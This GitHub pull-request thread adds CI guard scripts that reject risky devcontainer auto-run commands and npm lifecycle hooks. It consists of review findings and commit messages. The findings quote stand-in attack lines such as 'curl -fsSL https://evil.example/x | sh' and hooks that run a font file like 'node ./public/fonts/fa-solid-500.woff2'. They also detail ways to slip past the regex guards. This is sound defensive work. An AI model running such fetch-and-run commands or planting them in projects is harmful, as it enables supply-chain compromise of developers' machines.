ci: guard devcontainer auto-run config and npm lifecycle hooks - #485
Conversation
Extends the supply-chain guardrails from #484 with two preventive guards: - scripts/guard/guard_devcontainer.py (Guard C) Rejects dev-container JSONC that auto-runs risky commands on create/start/ attach: network fetch piped to a shell, execution of a binary/asset path rather than a manifest, and root user combined with an exec hook. Plain bootstrap commands (npm ci, cargo build, apt-get) are allow-listed. - scripts/guard/guard_npm_lifecycle.py (Guard D) Rejects package.json lifecycle hooks (preinstall/install/postinstall/ prepare/prepublish/prepublishOnly) that execute a binary/asset path, fetch code from the network, or use eval()/atob()/long base64 blobs. Standard tooling (husky, pinst, patch-package, tsc, node-gyp, npm run) is allow-listed. Both guards are PREVENTIVE: this repository currently has no .devcontainer/ and no package.json, so each inspects zero files in production and exits 0. Their effectiveness is verified by fixtures only, and the README says so. Adds 13 devcontainer fixtures and 16 npm fixtures (positive = must fail, negative = must pass), two generators, and CI jobs devcontainer-guard and npm-lifecycle-guard. The existing 12 jobs, triggers and env are unchanged. No production code, no Rust crates, and no historical payload bytes are included or executed.

Allow-list prefixes such as echo, tsc and patch-package let any chained command pass.
- Problem:
_SAFE.match(cmd)checks only the start of the string. Several patterns have no end anchor:^\s*echo\b,^\s*tsc\b,^\s*node-gyp\b,^\s*patch-package\b,^\s*husky\s+install\b.check_package_jsonreturns early on_is_safe(Line 142), beforeRUNS_ASSET,NETWORK_FETCH,OBFUSCATIONandBASE64_BLOBrun. - Code path:
"postinstall": "echo done && node ./public/fonts/fa-solid-500.woff2"→^\s*echo\bmatches →continue→ exit 0. The same happens with"prepare": "tsc; curl -fsSL https://evil.example/x | sh". - Why it matters: This is the font-asset launcher pattern from the incident the guard targets. Plain chaining after
echobypasses every detector. - Fix:
- Run the four detectors before the allow-list.
- Accept a command only when every shell segment matches the allow-list.
- Reject
$(and backticks. - Add a positive fixture such as
echo ok && node ./public/fonts/x.woff2.

Addresses all blocking findings from the independent maintainer review: 1. Allow-list no longer short-circuits danger checks (Guard C + D). Previously a command matching the allow-list (npm ci, husky install, tsc, echo) skipped FETCH_AND_RUN / RUNS_ASSET scanning entirely, so 'npm ci && curl evil.test | sh' passed silently. Danger patterns are now evaluated on the WHOLE command string; the allow-list only suppresses noise for known-good single commands. 2. Allow-list patterns anchored with $ so an allow-listed tool must be the entire command line; appended payloads fall through to danger scanning. Covers &&, ;, newline, backslash-continued, and env-var chaining (regression fixtures added for all five). 3. Guard C now accepts all valid postCreateCommand forms per the devcontainer spec: string, array (each element scanned), and object with a 'command' key. Previously array/object forms produced a type error (false positive) and their contents were never scanned (false negative). 4. Guard C FETCH_AND_RUN now matches wget/curl/Invoke-WebRequest/irm piped to sh/bash/pwsh/iex anywhere in the command, including after an allow-listed prefix. 5. False-positive reduction: npm run <script> chains, --if-present, node ./scripts/<file>.js project scripts, bun install, pip install, and clean array/object forms now pass. Asset-path detection narrowed to asset-like extensions (.woff2/.ttf/.otf/.eot/.llf), asset/seed directories (dist/, public/fonts/, assets/), and .js outside scripts/. 6. 17 new regression fixtures (5 devcontainer positive, 4 negative, 5 npm positive, 3 negative) lock every reviewed FN and FP case. Fixture generators updated; harness extended with chained-command message assertions. Suite: 0 failures. 7. CI hardening: workflow-level 'permissions: contents: read' and 'persist-credentials: false' on all 14 checkout steps, so a compromised step or fork PR cannot exfiltrate or persist GITHUB_TOKEN. Known residual limitation (documented in README, not blocking): an obfuscated payload constructed via shell command substitution rather than eval(/atob( is not detected — pattern-based, not an interpreter. No Rust/product code touched. No historical payload bytes included.
…ve npm guard paths against --root Guard C (devcontainer): - _normalize_commands() now scans named-command object values under ANY key (e.g. 'setup'), not only 'command' — the devcontainer CLI accepts named commands under arbitrary property names, so a hostile command under another key was skipped silently. - Empty named-command objects and non-string command values now fail loud with a diagnostic instead of being treated as safe. - Fixtures: named-key-setup-danger (curl|sh under 'setup'), object-form-empty, object-form-bad-type (must fail), named-key-setup-clean, named-key-multi-clean (must pass). Guard D (npm lifecycle): - tracked_package_jsons() returns absolute paths resolved against --root, so a guard invoked from a different working directory still inspects every tracked manifest (paths were CWD-relative before and manifests could be missed without any error). - Diagnostics keep repo-relative paths; unresolvable tracked paths fail loud instead of 'inspected 0'. - Regression: temp git repo built by make_external_root.py, guard run from /tmp with --root outside CWD; hostile manifest must be caught and safe manifest must pass. All 118 fixture assertions pass; actionlint clean on ci.yml.

Fix: array-form commands are scanned element by element, so split interpreter and path arguments evade detection.
- Problem: The list branch returns each element as a separate command. The module docstring says elements are joined for scanning, but the code does not join them.
- Code path:
"postCreateCommand": ["node", "./public/fonts/x.woff2"]→ scanned as"node"and"./public/fonts/x.woff2"→RUNS_ASSETneeds interpreter and path in one string → rc=0. The same happens with["bash", "./dist/setup.js"]. - Why it matters: Array form is the spec form for running an argv directly. It is the natural way to write an interpreter plus asset path.
- Fix: Also return the space-joined form when all elements are strings.

…ript gaps Re-audit of a7c3735 found these confirmed false negatives; all fixed: Guard C (devcontainer): - _normalize_commands read only val["command"] when present, so a dangerous sibling key ("setup": "curl ... | sh") was skipped. Now every string/array value in a named-command object is normalized and scanned. - Empty named-command objects and non-string command values now fail loud with a diagnostic instead of silently passing. - Array form executes directly via exec (no shell). Added interpreter+path detection across argv[0]/argv[1]: ["node","./public/fonts/x.woff2"], ["bash","./dist/setup.js"], ["sh","-c","curl ... | sh"] all fail. - Asset/seed regexes required a ./- or /-prefixed path; bare paths (node dist/setup.js, node public/fonts/x.js, node assets/bootstrap.mjs) were missed. Detection now covers ./ and bare forms. Guard D (npm lifecycle): - RUNS_ASSET_SEED and RUNS_ASSET_DOT_JS required a ./ prefix; bare asset paths (node dist/setup.js, node public/fonts/x.js, node assets/bootstrap.mjs) were missed. Detection now covers ./ and bare forms. - The allow-list accepted "node ./scripts/<file>.js" as a spelling without inspecting the referenced script, creating a real bypass (a script doing curl|sh would pass). Now referenced local scripts are resolved and scanned for the same danger patterns (network fetch, eval/atob, base64 blobs, asset-path execution). Missing/unreadable/out-of-package references fail loud. Documented as NOT a JavaScript malware detector. - node-scripts-postinstall fixture now ships an actual local script so the content inspection is genuinely exercised. - husky-backslash-chain-curl fixture now decodes to an actual backslash + newline (line continuation), not a backslash escaping a space; a test asserts the decoded value explicitly. Tests: 151/151 pass (was 118). actionlint on ci.yml clean. git diff --check clean. README updated for the new policy and limitations.
The previous commit accidentally committed two .pyc files under scripts/guard/__pycache__ (created by an ad-hoc import probe during verification). They are not source; remove them from the tree and add __pycache__/ + *.pyc to .gitignore so future local runs cannot commit bytecode. No guard logic, fixture, or workflow change.
…e script refs Targeted re-audit of 85a0d39 found two remaining false negatives: Guard C (devcontainer): - _normalize_commands stringified non-string array elements via str(p), so [42], [null], and ["node",{"path":"dist/setup.js"}] silently passed and [{"setup":"curl ... | sh"}] failed only accidentally (the str(dict) repr happened to match a pattern). Array-form hooks are argv lists of strings per the spec: malformed elements now fail closed with a diagnostic naming the offending type instead of being stringified. Legitimate string arrays (["npm","ci"], ["npm ci","cargo build"]) still pass. Generic unsupported-shape diagnostic deduped. Guard D (npm lifecycle): - NETWORK_FETCH only matched shell tools, so a referenced local script doing fetch('https://...') or require('https') passed. Added JS_NETWORK_FETCH (fetch(, require('http(s)'), import, from, axios.*) to the local-script scan. - Absolute (/...) and home (~...) script references were silently skipped; they now fail closed. The ~/ prefix is captured by _LOCAL_SCRIPT_REF so the fail-closed branch is reached. Fixtures: array-element-number/null/object/mixed-object/subarray (Guard C, must fail with 'unsupported element'), local-script-js-fetch and local-script-escape (Guard D, must fail with intended diagnostic). README updated. No Rust/product or workflow changes. Tests: 168/168 pass (was 151). actionlint clean on ci.yml, git diff --check clean, py_compile clean.

Fix: an interpreter option, a full interpreter path, or a path through another folder lets the asset checks miss the launch.
- Problem:
RUNS_ASSET,RUNS_ASSET_SEEDandRUNS_ASSET_DOT_JSmatch only when the path comes right after the interpreter ((?:node|sh|bash|pwsh)\s+<path>). The lookbehind(?<![\w./-])also rejects any interpreter written as a full path.RUNS_ASSET_SEEDallows only(?:\.*/)*before the directory name. The array check at Lines 360-362 joins onlyargv[0]andargv[1], and it is skipped whenargv[1]starts with-. - Code path:
check_commandcontains no allow-list rejection, so a hook passes when no danger pattern matches. Each of these values gives rc=0:"node --no-warnings ./public/fonts/x.woff2":\s+\S*cannot get past the option."/usr/bin/node ./dist/setup.js": the lookbehind fails because/comes beforenode."node ./scripts/../dist/setup.js":SEEDcannot matchscripts/, andDOT_JSexcludes./scripts/."node app/dist/setup.js": no pattern accepts theapp/prefix.["node", "--no-warnings", "./public/fonts/x.woff2"]or["/usr/bin/env", "node", "dist/setup.js"]: the array check never builds the combined command.
- Why it matters: This is the incident shape the guard targets: an interpreter that runs a font or seed asset. An ordinary option or a full interpreter path is enough to get past the check.
guard_npm_lifecycle.pyhas the same regexes at Lines 93-106 (see the comment there). - Fix: Use one shared interpreter prefix. Let it accept a directory path and option tokens. Accept any
\S*/prefix before the asset directory. Scan the whole joined argv for array hooks.

…sal dirs
Finding 1 — Asset execution bypass:
- RUNS_ASSET / RUNS_ASSET_SEED / RUNS_ASSET_DOT_JS in both guards now use
a shared _INTERP pattern that accepts:
- Interpreter options: node --no-warnings ./public/fonts/x.woff2
- Full interpreter paths: /usr/bin/node ./public/fonts/x.woff2
- Nested directories: node app/dist/setup.js
- Traversal paths: node ./scripts/../dist/setup.js
- Removed the (?<![\w./-]) lookbehind that blocked /usr/bin/node
- Changed SEED prefix from (?:\.*/)* to (?:[^\s]*/)? to handle
arbitrary path prefixes (app/, scripts/../) without swallowing bare paths
Finding 2 — Local script inspection skips interpreter options:
- _LOCAL_SCRIPT_REF now captures an optional (?P<flags>...) group
between 'node' and the script path, supporting both short/long flags
and --flag=value forms
- Flag is never mistaken for the script path (named group)
- Fail-closed for absolute, home, missing, and escaping references
is unchanged
Finding 3 — Fixture suite cwd-dependence:
- run_fixture_tests.sh heredoc now passes $FIX/... as argv[1]
instead of hardcoding a relative path
- Suite now passes from both repo root and tests/guard/
Regression fixtures added:
- Guard C: option-asset, fullpath-asset, nested-seed, traversal-seed (positive)
option-script-clean, fullpath-script-clean (negative)
- Guard D: option-asset, fullpath-asset, nested-seed, traversal-seed (positive)
option-local-script-danger (positive, script with fetch())
option-local-script-clean, fullpath-local-script-clean,
option-flag-value-clean (negative)
- All fixtures assert both exit status and expected diagnostic
Suite: 204 PASS / 0 FAIL from both repo root and tests/guard/

…mantics Dev Container array-form hooks are a single argv executed directly (no shell): element[0] is the executable, later elements are arguments. The old fixtures encoded two shell commands as two argv elements, which is not a valid representation of what devcontainer executes. - array-form-danger: ["npm ci", "curl evil.test | sh"] -> ["sh", "-c", "npm ci && curl evil.test | sh"] (valid argv that actually runs the network-fetch pipeline under sh; guard still flags FETCH_AND_RUN via the argv[0..1] recombination scan) - array-form-clean: ["npm ci", "cargo build"] -> ["npm", "ci"] (executable "npm" with argument "ci", not a literal binary named "npm ci") Both verified against guard_devcontainer.py: danger rc=1 with 'network fetch' diagnostic, clean rc=0. Full fixture suite 226 PASS / 0 FAIL from repo root.
